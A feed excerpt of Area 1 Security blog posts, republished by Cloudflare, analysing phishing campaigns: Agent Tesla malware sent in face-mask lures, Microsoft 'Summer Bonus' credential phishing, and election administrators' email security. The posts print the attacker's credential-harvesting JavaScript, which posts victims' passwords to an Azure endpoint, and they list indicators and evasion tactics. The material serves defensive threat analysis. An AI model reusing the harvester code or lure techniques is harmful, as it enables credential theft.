            <content:encoded><![CDATA[ <p><i>This blog originally appeared in August 2020 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>It’s no surprise that the world is currently facing a major shortage of the now-iconic blue surgical mask. Once only seen in hospitals and medical dramas, these masks are now the hottest selling streetwear. New state regulations now have businesses saying, “No Shirt, No Shoes, No Mask, No Service.” The incredible demand has led opportunistic businesses to get into the import/export of this vital article.</p><p>Recent phishing campaigns are also capitalizing on this trend by sending email attachments infected with <a href="https://www.aha.org/standardsguidelines/2020-06-16-hc3-sector-note-tlp-white-remote-access-trojan-agent-tesla-targets">Agent Tesla malware</a>, an advanced Remote Access Trojan (RAT), to various companies under the guise of a mask production business venture. Area 1 Security caught these attacks filled with enticing traps that bypass legacy vendors and would have otherwise made their way into users’ inboxes.</p>
    <div>
      <h3>Face Mask and Forehead Thermometer Phishing</h3>
    </div>
    <p>A prevalent phishing campaign loaded with a malicious executable is attempting to wreak havoc on companies worldwide, spanning numerous industry verticals. This campaign began as early as May, during the start of major lockdowns and mask shortages across the globe due to the COVID-19 pandemic. There have been numerous iterations of the campaign, but the main body of text remains the same.</p><p>The attacker lures targets by using language that preys on fears surrounding COVID-19 and claiming to offer face masks and forehead thermometers, products currently in high demand but short supply. To avoid detection, the phishing campaign generally follows a 10-day cycle wherein the threat actor slightly modifies their Tactics, Techniques, and Procedures (TTPs) before launching a new wave of emails. A recent phishing message from this campaign can be found below.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2bBDzRT9eirJr0ZQC3SyfZ/77c6396e6abefae34b3681415be7fafd/image4-8.png" />
            
            </figure><p>Transchem Inc. is not associated in any way with this attack</p><p>The attacker spoofs chemical manufacturers and import/export businesses to make the phishing message appear more legitimate. Area 1 Security’s research shows that the attacker continually revises their phishing messages by periodically spoofing different companies in an effort to evade detection. For the example phish above, the attacker spoofed Transchem Inc., a legitimate chemical supplier. With previously spoofed companies, the attacker included the real email address of the purported sender in the signature block; however, in this latest campaign, they remove it to reduce the chances of being detected.</p><p>To achieve the greatest success in reaching the most inboxes, the attacker uses a dynamic approach to stay one step ahead of common email security defenses:</p><ul><li><p>With each wave of the campaign, the attacker rotates to a new IP address in a likely attempt to bypass filters that only deny based on known sources of malicious activity;</p></li><li><p>Furthermore, the malware in the attachment is continually modified in order to change its hash; and</p></li><li><p>With a new hash value, the malware is effectively brand new — legacy detections that are configured to scan for known malicious hashes will not alert on this.</p></li></ul><p>Additionally, due to flaws in the implementation and configuration of email authentication protocols, such as DMARC, SPF and DKIM, the attacker is able to successfully spoof the legitimate sender domains of numerous companies. This demonstrates that the complexity and nuances involved in setting up these protocols can leave you open to attack, and, even when implemented properly, are not enough to protect you from the dynamic phishing attacks that plague companies and individuals.</p><p>After bypassing a well-known email gateway and DMARC controls, the only defense left is for the email recipient to recognize this email as a phish. 
However, the attacker goes to great lengths to present an authentic façade. They:</p><ul><li><p>Impersonate real employees at various companies to fool unsuspecting targets into downloading purported information on the production of face masks and forehead thermometers;</p></li><li><p>Include the legitimate logo of the spoofed company, as well as accurate mailing and contact details; and</p></li><li><p>Include a URL in the email’s signature block that leads to the legitimate website of the impersonated company.</p></li></ul><p>The attacker is clearly going the extra mile to ensure this spoof will appear as authentic as possible to unsuspecting targets.</p><p>Once the email is delivered, recipients are a mere two steps away from executing the Agent Tesla RAT. The target only needs to extract the compressed attachment, then click on the resulting “PDF”, which will launch the malware.</p><p>To further reduce suspicion, the attachment’s file name is manipulated to make it appear legitimate. More specifically, the attacker always names the attached file “Supplier-Face Mask Forehead Thermometer.pdf.gz”. The use of a double extension will often trick targets into thinking the file is a PDF, when in fact it’s a compressed executable. This ruse is made possible by the fact that many modern operating systems hide the final extension (in this case “.gz”) of known file types by default.</p><p>Once downloaded, victims may only see “Supplier-Face Mask Forehead Thermometer.pdf”, which is the actual file name. To make matters worse, some legacy vendors inspect an attachment’s extension <i>rather than the file contents themselves</i>, thus allowing compressed executables to bypass rule filtering that is based on file extension.</p>
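            <p>The following Python, added here as an example and not taken from the post or from Area 1 Security’s product, shows the difference between judging an attachment by its name and by its bytes: it flags the double extension, checks the leading signature against the declared extension, and looks inside a gzip member (with an inflation cap) for a PE header. The gzip members, the inert MZ stub and the file names are constructed for the example; no real sample is used.</p>

```python
import gzip
import io

# Constructed samples: a gzip member wrapping inert bytes that merely start with
# a PE/MZ header, named like the campaign attachment, and a gzip-wrapped PDF
# stub delivered under a plain .pdf name. Neither is real malware.
FAKE_EXE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 256
SAMPLE_NAME = "Supplier-Face Mask Forehead Thermometer.pdf.gz"
SAMPLE_DATA = gzip.compress(FAKE_EXE)
MISMATCH_DATA = gzip.compress(b"%PDF-1.4\n%constructed stub\n")

# Leading-byte signatures, checked in order; for document types the label is
# also the extension the name is expected to carry.
MAGIC = [
    (b"%PDF-", "pdf"),
    (b"\x1f\x8b", "gzip"),
    (b"PK\x03\x04", "zip"),
    (b"MZ", "pe-executable"),
]
DOCUMENT_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "rtf", "txt"}
MAX_INFLATE = 50 * 1024 * 1024  # never inflate a member beyond this many bytes


def sniff(data):
    """Classify bytes by signature, ignoring the file name entirely."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return "unknown"


def extensions(name):
    """All dot-separated suffixes, lower-cased: 'a.pdf.gz' -> ['pdf', 'gz']."""
    return name.lower().split(".")[1:]


def inspect_attachment(name, data):
    """Compare what the file name claims with what the bytes actually are."""
    exts = extensions(name)
    outer = sniff(data)
    inner, findings = None, []

    # Name-based checks: the .pdf.gz trick relies on the desktop hiding ".gz".
    if len(exts) > 1 and exts[-2] in DOCUMENT_EXTENSIONS:
        findings.append(f"double extension .{exts[-2]}.{exts[-1]} hides the real type")
    if exts and exts[-1] in DOCUMENT_EXTENSIONS and outer != exts[-1]:
        findings.append(f"declared .{exts[-1]} but content is {outer}")

    # Content-based checks: look inside the archive, with an inflation cap so a
    # decompression bomb cannot exhaust the scanner.
    if outer == "gzip":
        try:
            with gzip.GzipFile(fileobj=io.BytesIO(data)) as gz:
                payload = gz.read(MAX_INFLATE + 1)
        except (OSError, EOFError):
            payload = b""
            findings.append("gzip member could not be inflated")
        if len(payload) > MAX_INFLATE:
            findings.append("inflated size exceeds limit (possible decompression bomb)")
        inner = sniff(payload)
        if inner == "pe-executable":
            findings.append("compressed payload is a PE executable")
    elif outer == "pe-executable":
        findings.append("attachment is a PE executable")

    return {"extensions": exts, "outer": outer, "inner": inner,
            "findings": findings, "verdict": "block" if findings else "allow"}


if __name__ == "__main__":
    print(inspect_attachment(SAMPLE_NAME, SAMPLE_DATA))
```

            <p>For the campaign’s file name the verdict is “block” on two independent grounds, the double extension and the PE payload inside the gzip member, and either alone would suffice; an extension-only filter of the kind the post criticises would see “.gz” and let it through.</p>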
    <div>
      <h3>Analysis of Executable</h3>
    </div>
    <p>The attachment is the focal point of this face mask-themed campaign. In order to carry out its information stealing capabilities, this infected attachment requires the target to take action by unzipping and clicking on the resulting file, “Supplier-Face Mask Forehead Thermometer.pdf.exe”. If this file is opened, the victim host will be infected with Agent Tesla, a form of Malware-As-A-Service (MaaS), which provides attackers with a dashboard and user interface (UI) to monitor the success of their campaign. Agent Tesla is an advanced RAT that functions as a keylogger and information stealer, and its primary delivery method is via attachments in phishing emails.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3kmWesi4eUB1tfkRnlamWf/639dc91ded1a88a61347aa38a9fe862b/image2-14.png" />
            
            </figure>
    <div>
      <h3>What is Agent Tesla?</h3>
    </div>
    <p>Although Agent Tesla first surfaced in 2014, it is making a resurgence as the preferred MaaS for attackers, superseding even TrickBot and Emotet. The main advantage of Agent Tesla is its ability to adapt and change to avoid detection, providing attackers with a stealthy platform to launch attacks and bypass security measures. Various tiers are available for purchase that provide additional licenses and different functionality. However, in typical internet fashion, there is a torrent available on Russian websites.</p><p>For the initial file, the attacker uses a 32-bit Windows executable to ensure that the malware can be executed on common Windows devices. This file is a trojan, appearing as a benign application but containing hidden, malicious functionality. This initial phase determines whether it is running in a malware analysis environment so the program can decide whether to proceed with the attack or go to sleep.</p><p>If the malware determines it is running on a real target’s device, it will make a connection to the attacker’s command and control (C2) server located at us2[.]smtp[.]mailhostbox[.]com. This initial connection does not carry any stolen information; rather, it only serves to confirm to the attacker that the malware successfully ran on the target device.</p><p>The malware contains functionality to read the data within a victim’s AppData folder, which holds browser credentials and credentials from email clients. The malware will attempt to load missing DLLs and download additional files in order to exfiltrate stolen information from the AppData folder. This data is sent to the C2 via SMTP, as seen in the packet capture below. This is a common tactic for exfiltration, given that outgoing emails containing sensitive information are not likely to be marked as suspicious unless Data Loss Prevention (DLP) software is configured. The exfiltrated victim information is then available to the attacker via the Agent Tesla UI for use in future attacks.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1tXyxamhlhwBBgE7RYyh3K/45a0414060ee8e06f77551c39e47f7bb/image3-8.png" />
            
            </figure><p>With each new wave of this phishing campaign, the malware is updated by using a number of advanced obfuscation techniques to avoid detection by antivirus software:</p><ul><li><p>Firstly, the attacker generates a new hash for the attached file in order to circumvent defenses that leverage databases of known malware files. This is done in part by generating executables written for the .NET framework and constantly recompiling with alternative feature sets.</p></li><li><p>Secondly, a number of anti-debugging methods are employed to halt any reverse engineering. These methods check if a debugger is present, as well as hiding threads and breakpoints from debugging tools.</p></li></ul>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7H7191Nj247N6yOpM0BVC6/9e8ef71059a9af8a9a25557afd542ad2/image1-11.png" />
            
            </figure>
    <div>
      <h3>Recommendations</h3>
    </div>
    <p>If you think your device may have been compromised by malware, it’s imperative to run a full scan of your system to check for signs of infection. It’s also vital to keep your software and OS secure by installing the latest updates on a routine basis in order to reduce exposure to this “Face Mask Supplier” phishing campaign.</p><p><b>It is not enough to rely on email gateways, cloud email suites and traditional AV to protect against these types of attacks, as the threat actor is continually evolving and finding new ways to leverage commodity malware like Agent Tesla.</b></p><p>As attackers often rely on the end user to download and install malicious executables, it is also vital that employees are aware of common tactics an attacker may use to trick targets into opening malicious files. Unsolicited emails from unknown companies should be regarded as guilty until proven otherwise and reported to the security team. Additionally, any attachments containing compressed files should be handled with extreme caution, and any executable files should not be opened. These extra verifications are just a small precaution but go a long way toward ensuring the safety and security of your organization.</p><p>With each wave of the campaign, the malicious files and attacker infrastructure are altered to evade detection. Fortunately, Area 1 Security’s comprehensive protection detects and blocks Agent Tesla-based phishing attacks and other targeted campaigns before they can cause any damage.</p><p>Area 1 Security’s advanced Machine Learning and Artificial Intelligence technology allows our algorithms to uncover new tactics malicious actors are using to bypass legacy vendors and cloud email providers in real time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This has many advantages over post-delivery retraction in that the user is never exposed to the attack.</p>
    <div>
      <h3>Indicators of Compromise</h3>
    </div>
    <p>Attachment: Supplier-Face Mask Forehead Thermometer.pdf.gz:</p><p>MD5: fdfaaf9efb8507262ee9b97324bbb69a</p><p>SHA1: 846da85a2f2e6e79ebc7ed84b00ed97af513c80f</p><p>SHA256: b419849ce915ede72fda1ea0b566651e233ef5eaffbf8b9211bd44085407ad5e</p><p>Executable: Supplier-Face Mask Forehead Thermometer.pdf.exe</p><p>MD5: 64bc654373549584f7e596de24e1d8cc</p><p>SHA1: 6a39bd3ddaa2c9846e2a4912a80fd718eaee622f</p><p>SHA256: 53445247552485c277400bafba84458670f0c1001c91b4f0bcc15935c12d662b </p><p>Command and Control Server:</p><p>us2[.]smtp[.]mailhostbox[.]com</p><p>Sender IP Addresses:</p><p>209[.]58[.]149[.]65</p><p>203[.]188[.]252[.]14</p><p>185[.]66[.]40[.]36</p><p>50[.]28[.]40[.]153</p><p>62[.]210[.]83[.]136</p><p>72[.]32[.]232[.]136</p><p>95[.]216[.]16[.]146</p><p>209[.]58[.]149[.]66</p><p>89[.]33[.]246[.]113</p><p>178[.]239[.]161[.]164</p><p>156[.]96[.]47[.]65</p><p>209[.]58[.]149[.]69</p><p>95[.]211[.]208[.]50</p><p>209[.]58[.]149[.]87</p><p>37[.]48[.]85[.]232</p><p>208[.]91[.]199[.]224</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <guid isPermaLink="false">2013plj8N4MmDupwNzOjAi</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[July bonus Microsoft spear phishing]]></title>
            <link>https://blog.cloudflare.com/july-bonus-microsoft-spear-phishing/</link>
            <pubDate>Mon, 17 Aug 2020 12:43:00 GMT</pubDate>
            <description><![CDATA[ The creators of two Microsoft phishing campaigns, that Area 1 has dubbed “Summer Bonus”, are attempting to lure unsuspecting employees into divulging their Microsoft credentials. ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in August 2020 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>Isn’t it great that some companies are <a href="https://www.msn.com/en-us/money/companies/these-30-companies-are-giving-bonuses-and-raises-to-their-essential-workers/ss-BB179W66?li=BBnb7Kz">giving out bonuses</a> to their front-line workers amidst the pandemic? That’s precisely what the creators of two new Microsoft phishing campaigns, that Area 1 has dubbed “Summer Bonus”, are using to lure unsuspecting employees into divulging their Microsoft credentials. Few companies are doing well enough to give out bonuses these days, making an unexpected notification from your employer on a paycheck increase all the more enticing. Area 1 Security suspects that this attack is inspired by all the media buzz around unprecedented bonuses to essential workers. No good deed goes unpunished.</p>
    <div>
      <h3>Microsoft SharePoint Phishing</h3>
    </div>
    <p>Microsoft SharePoint Phishing schemes have increasingly plagued companies using the Microsoft Office 365 Suite in recent years. In the spear phishing example below, even a diligent user versed in online safety measures could be fooled by this highly convincing phishing attempt. The attack leverages sophisticated social engineering techniques and a flaw in how legacy email solutions detect malicious messages.</p><p>Targeted victims receive an email similar to the one below.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6J93NgwSIi1hCq5Iq05VOd/f04d7a9b87707add1bed71b5b9f9baaa/image1-13.png" />
            
            </figure><p>The email is crafted well enough to pass for a legitimate file share request that most employees wouldn’t think twice about clicking. (Who would pass up a bonus, especially in the COVID era?) The FROM address is spoofed to look like it’s coming from an automated service within the targeted company, i.e. noreply@&lt;company.com&gt;. A careful analysis of the email headers indicates the first Mail Transfer Agent is a Russia-based server farm hosted at mgn-host[.]ru, which is where the bulk of the emails originated before August 1st.</p><p>Unsurprisingly, a WHOIS lookup of this sender domain, as shown below, reveals little useful information about the registrant.</p>
            <pre><code>% IANA WHOIS server
% for more information on IANA, visit http://www.iana.org
% This query returned 1 object
refer:        whois.tcinet.ru
domain:       RU

organisation: Coordination Center for TLD RU
address:      8 Marta street 1, bld 12
address:      Moscow  127083
address:      Russian Federation

contact:      administrative
name:         .RU domain Administrative group
organisation: Coordination Center for TLD RU
address:      8 Marta street 1, bld 12
address:      Moscow  127083
address:      Russian Federation
phone:        +7 495 730 29 71
fax-no:       +7 495 730 29 68
e-mail:       ru-adm@cctld.ru

contact:      technical
name:         Technical Center of Internet
organisation: Technical Center of Internet
address:      8 Marta street 1, bld 12
address:      Moscow  127083
address:      Russian Federation
phone:        +7 495 730 29 69
fax-no:       +7 495 730 29 68
e-mail:       ru-tech@tcinet.ru

nserver:      A.DNS.RIPN.NET 193.232.128.6 2001:678:17:0:193:232:128:6
nserver:      B.DNS.RIPN.NET 194.85.252.62 2001:678:16:0:194:85:252:62
nserver:      D.DNS.RIPN.NET 194.190.124.17 2001:678:18:0:194:190:124:17
nserver:      E.DNS.RIPN.NET 193.232.142.17 2001:678:15:0:193:232:142:17
nserver:      F.DNS.RIPN.NET 193.232.156.17 2001:678:14:0:193:232:156:17
ds-rdata:     32215 8 2 803E2ADED022F18F59CBD68A39812BC2D224D2A68E6D701BEDF62B7E4CD92233

whois:        whois.tcinet.ru

status:       ACTIVE
remarks:      Registration information: http://www.cctld.ru/en

created:      1994-04-07
changed:      2020-07-09
source:       IANA

# whois.tcinet.ru

% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian) 
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).

domain:        MGN-HOST[.]RU
nserver:       ns1.mgnhost.com.
nserver:       ns2.mgnhost.com.
nserver:       ns3.mgnhost.com.
state:         REGISTERED, DELEGATED, VERIFIED
person:        Private Person
registrar:     REGTIME-RU
admin-contact: https://whois.webnames.ru
created:       2009-09-13T20:00:00Z
paid-till:     2021-09-13T21:00:00Z
free-date:     2021-10-15
source:        TCI</code></pre>
            <p>After August 1st, a new wave of the campaign emerged, revealing a change in the attacker’s tactics. The campaign is now being launched via a virtual private server (VPS), obscuring the attacker’s true origin and making the header seem a bit more innocuous than a glaring .ru address. It’s evident that the attacker is adapting to new detection techniques.</p><p>A large number of Area 1 Security customers were targeted in this ongoing attack, aimed at harvesting user credentials. At first glance, the message seems benign enough. The email displays a Microsoft SharePoint notification tailored to the targeted company and contains the recipient’s email address. Disguised as a simple “Open” button, the link in the message body leads to an AppSpot URL: hxxps://useryxijxui99[.]an[.]r[.]appspot.com/#@.com. Every few days the attacker changes subdomains in an attempt to evade detection.</p><p>Appspot.com is a cloud computing platform for developing and hosting web applications in Google-managed data centers. Despite its legitimate uses, AppSpot is a commonly abused platform, offering attackers a clever way to bypass traditional spam and phish filters. When clicked, this AppSpot link reveals a very convincing Microsoft login portal as shown below.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6QSONLnMKwpJLOs9FcyTaQ/9430d1a2ddaaa31d066f05e5d740e08c/image3-10.png" />
            
            </figure><p>The success of these campaigns is a result of the infamous Layer 8 error (user error, <a href="https://www.lifewire.com/have-you-been-the-butt-of-a-tech-joke-2619218">for the non-technicals</a>). Among other techniques, an easy way to spot if a login portal is being spoofed is to simply verify the URL. If the site is a login for Microsoft then the corresponding link should direct your browser to a legitimate Microsoft domain, not appspot.com. The adage “if it seems too good to be true” also rings true for most phishing schemes. It’s always good practice to check with a supervisor before responding to unsolicited requests for credentials or logins, especially as they pertain to company financial matters.</p><p>This campaign peaked on July 31st in a likely attempt to dupe targets into believing this was a legitimate end-of-month bonus. In the days following, the number of emails drastically decreased, with the attacker sending only a small batch of phish every three to four days usually near the end of the business day. Despite the decline in this “Summer Bonus” phish, Area 1 Security believes there could be a resurgence of this attack in the coming months.</p>
    <div>
      <h3>Analysis of HTML Page</h3>
      <a href="#analysis-of-html-page">
        
      </a>
    </div>
    <p>Analyzing the source file of the spoofed login page reveals several interesting methods the attacker is using to circumvent defenses and steal credentials. To give a high-level overview of the process, the login page is hosted on AppSpot and, as such, is issued a valid <a href="https://www.cloudflare.com/application-services/products/ssl/">SSL certificate</a>. To an unsuspecting user, this gives an otherwise malicious site a very trustworthy appearance.</p><p>Benign cloud-based services like AppSpot provide attackers the perfect platform for hosting their malicious content, all the while flying under the radar of legacy vendor email security solutions. The attacker used the HTML/CSS framework of the authentication page for the Microsoft portal but replaced the JavaScript with their own malicious functions.</p><p>In the below code snippet you can see how the attacker is sending victim credentials to the cloud-based site hxxps://701r10010ye[.]azurewebsites[.]net. This additional attacker infrastructure is hosted on yet another commonly abused cloud computing platform, Microsoft Azure. In other words, to better evade detection, the attacker is abusing multiple cloud-based services for not only hosting spoofed login pages but also for obtaining the stolen credentials.</p>
            <pre><code>if($('.pass_section_xyz').length){
    var pass = $('#i0118');            // password field of the cloned Microsoft login form
    var password_v = pass.val();
    // yid appears to hold the username captured on the previous screen (defined outside this excerpt)
    if(yid &amp;&amp; yid != '' &amp;&amp; yid.length &gt; 4 &amp;&amp; password_v != ''){
        //var password_v = login_passwd.val();

        /*  */
        $.ajax({
            url: 'https://701r10010ye.azurewebsites.net/handler.php', // attacker-controlled collection endpoint on Azure
            type: 'POST',
            dataType: 'html',
            beforeSend: function(){
                $('.ldsddddd').show();          // show a loading spinner while the credentials are posted
            },
            data: { Email : yid, password : password_v},
            crossDomain: true,
            success: function(msg) {
                //alert(msg);
                $('.ldsddddd').hide();
                if(msg == 'yes'){
                    $('.alert_email_sect').hide();
                    window.location.replace("https://portal.office.com"); // send the victim on to the real portal
                }
                else{
                    $('.alert_msg_yxq').html("Your account or password is incorrect. If you don't remember your password");
                    $('.alert_email_sect').show();
                }
            }
        });
    }
}</code></pre>
            
    <div>
      <h3>Microsoft Planner Phishing</h3>
      <a href="#microsoft-planner-phishing">
        
      </a>
    </div>
    <p>A derivative of the SharePoint phish detailed above is wreaking havoc on company inboxes. This variant, possibly carried out by the same attackers, again uses the pretext of a “Summer Bonus” — but this time, attempts to spoof a Microsoft Planner email notification.</p><p>This spear phish is another great example of how attackers are skillfully crafting phishing messages to lure their targets. The text, images, and formatting are an almost identical match to the real Microsoft Planner notifications. This demonstrates how even employee cybersecurity training is not enough for a company to effectively mitigate its threat surface.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5dtvUOc5mUtcREXOjXBzeL/fa1428f3a6c1848a044f713c99eb96bf/image2-15.png" />
            
            </figure><p>The most glaring evidence that this is a phishing email can be found in the sender field. The attacker created a display name that makes it appear as if the true sender address was one belonging to the targeted company (i.e., noreply@sharepoint[.]com <b>@&lt;targeted_company.com&gt;</b>). Even the most scrupulous users might easily dismiss such a sender as benign. However, a closer look at the email headers exposes the true sender address, root@hwsrv-757045[.]hostwindsdns[.]com. Based on the sender domain, the attacker is using a VPS provider to launch their phishing campaign. Threat actors commonly rely on VPS services not only for their scalability and ease of use but also for their ability to obscure the attacker’s true location.</p><p>As with the previous SharePoint campaign, the detection of this “Microsoft Planner” phish uncovered the continued abuse of cloud computing platforms, this time Amazon Web Services (AWS). The “Open in Microsoft Planner” button in the body of the message links to hxxps://officezbf0kmun0j324qysxn0y98zchskfee[.]s3[.]us-east-2[.]amazonaws.com/index.htm?c=@.com. The AWS bucket associated with this attack was inactive at the time of writing; however, it is highly likely the URL linked to another spoofed Microsoft login portal.</p><p>This ever-evolving “Summer Bonus” campaign is an ongoing threat to many individuals and businesses alike. The use of VPS providers, as well as abuse of multiple cloud services throughout several stages of the attack, makes it a particularly difficult campaign to detect. To make matters worse, because the URLs used in the attacks point to legitimate domains and the messages contain no malicious payloads, traditional defenses will continually miss phish like this. In fact, the messages successfully passed through Microsoft’s Office 365 filter despite these red flags.</p><p>Fortunately, Area 1 Security detected this stealthy “Summer Bonus” campaign and stopped these phish from reaching our customers’ inboxes.</p><p>Area 1 Security’s advanced Machine Learning and Artificial Intelligence technology allows our algorithms to uncover new tactics malicious actors are using to bypass legacy vendors and cloud email providers in real time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This has many advantages over post-delivery retraction in that the user is never exposed to the attack.</p>
    <div>
      <h3>Indicators of Compromise</h3>
      <a href="#indicators-of-compromise">
        
      </a>
    </div>
    <p>hxxps://useryxijxui99[.]an[.]r[.]appspot[.]com/#@.com</p><p>hxxps://riqri733r[.]ts[.]r[.]appspot[.]com/#@.com</p><p>hxxps://officezbf0kmun0j324qysxn0y98zchskfee[.]s3[.]us-east-2[.]amazonaws[.]com/index.htm?c=@.com</p><p>hxxps://701r10010ye[.]azurewebsites[.]net/handler[.]php</p><p>root@hwsrv-757045[.]hostwindsdns[.]com</p><p>vds62403[.]mgn-host[.]ru</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <guid isPermaLink="false">gIN63kknA7qZzU2J6A587</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[New Area 1 security study shows that U.S. State & local election administrators remain vulnerable to phish]]></title>
            <link>https://blog.cloudflare.com/2020-elections-phishing-report/</link>
            <pubDate>Sun, 26 Jul 2020 12:52:00 GMT</pubDate>
            <description><![CDATA[ With only 100 days until Election Day, Area 1 Security’s new “Phishing Election Administrators” report assesses the depth of current email security controls used by 10,000 U.S. state and local election administrators. ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>Today, Area 1 Security published the results of “<a href="https://www.cloudflare.com/static/12411304c9c8902d6744dd8a641c6d9b/BDES-3794_CloudflareArea1_Report_PhishingElectionAdministrators_REVSEPT2022.pdf">Phishing Election Administrators</a>,” a comprehensive study analyzing more than 10,000 U.S. state and local election administrators’ email phishing vulnerabilities. With fewer than 100 days left until Election Day, the report reveals that states are still in widely varying stages of cybersecurity readiness.</p><p>Key findings include:</p><ul><li><p>The majority (53.24 percent) of state and local election administrators have only <i>rudimentary or non-standard technologies</i> to protect themselves from phishing;</p></li><li><p>Fewer than 3 out of 10 (28.14 percent) election administrators have <i>basic</i> controls to <a href="https://www.cloudflare.com/learning/email-security/how-to-prevent-phishing/">prevent phishing</a>;</p></li><li><p>Fewer than 2 out of 10 (18.61 percent) election administrators have implemented <i>advanced anti-phishing</i> cybersecurity controls;</p></li><li><p>A surprising 5.42 percent of election administrators rely on <i>personal email accounts</i> or technologies designed for personal email (such as Yahoo!, Hotmail, AOL or others), to conduct their duties; and</p></li><li><p>A number of election administrators independently manage their own custom email infrastructure, including using <a href="https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf">versions of Exim known to be targeted</a> by cyber actors linked to the Russian military that interfered in prior 
U.S. elections.</p></li></ul><p>Ninety-five percent of cybersecurity damages worldwide begin with phishing, and phishing campaigns come in all shapes and sizes. The majority of phishing campaigns begin with an <a href="https://www.wsj.com/articles/phishing-the-clintons-1481761502">innocuous, authentic-looking email</a> that individuals are unable to recognize as malicious. Consequently, the quality of email protection used by organizations and individuals has an inordinate bearing on their overall cybersecurity posture.</p><p>“Our elections are vital. They need to be resilient against whatever crisis the moment throws at us — and that requires resources and planning,” said Oren J. Falkowitz, co-founder of Area 1 Security. “However, most state and local election administrators are not very close to ensuring a safe election. This challenge is going to be exacerbated the longer it takes for them to get the resources and expertise needed to make changes.”</p><p><b>Area 1’s email security recommendations for state and local election administrators include:</b></p><ul><li><p><b>Ending use of Exim email servers:</b> Given the government’s guidance to update Exim to mitigate <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-10149">CVE-2019-10149</a> and other vulnerabilities including, but not limited to, <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-15846">CVE-2019-15846</a> and <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-16928">CVE-2019-16928</a>, election administrators are urged to cease use of Exim. Upgrading alone does not mitigate exploitation. Prior Russian cyber activities directed towards U.S. elections make use of Exim ill-advised. For those who must continue running Exim, update to the latest version; running a version prior to 4.93 leaves a system vulnerable to disclosed vulnerabilities. Administrators can update Exim Mail Transfer Agent software through their Linux distribution’s package manager or by downloading the latest version from <a href="https://exim.org/mirrors.html">https://exim.org/mirrors.html</a>.</p></li><li><p><b>Transitioning to cloud email infrastructure:</b> Running custom email infrastructure requires network administrators to be perfect every single day. Instead, Area 1 Security recommends the use of cloud email infrastructure such as Google’s GSuite or Microsoft’s Office 365 in combination with a cloud email security solution.</p></li><li><p><b>Ending use of personal email technologies for election duties:</b> Under no circumstances should election administrators use personal email for the conduct or administration of elections.</p></li></ul><p><i>Area 1 Security is committed to </i><b><i>Responsible Disclosure</i></b><i> guidelines in all situations where it uncovers specific and verifiable campaign activity. As part of our commitment to those guidelines, Area 1 has been engaged with relevant stakeholders that have an interest in understanding this campaign in greater depth.</i></p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Election Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <guid isPermaLink="false">6yCxGf6NVbSm9RWRKe3Q6x</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[Don’t trust that tweet…or that email from "Bill Gates"]]></title>
            <link>https://blog.cloudflare.com/dont-trust-that-tweet-or-email/</link>
            <pubDate>Mon, 20 Jul 2020 12:55:00 GMT</pubDate>
            <description><![CDATA[ On July 16th, 2020, an email appearing to be from the Bill & Melinda Gates Foundation was sent to numerous recipients, seeking donations for the Foundation in Bitcoin. ]]></description>
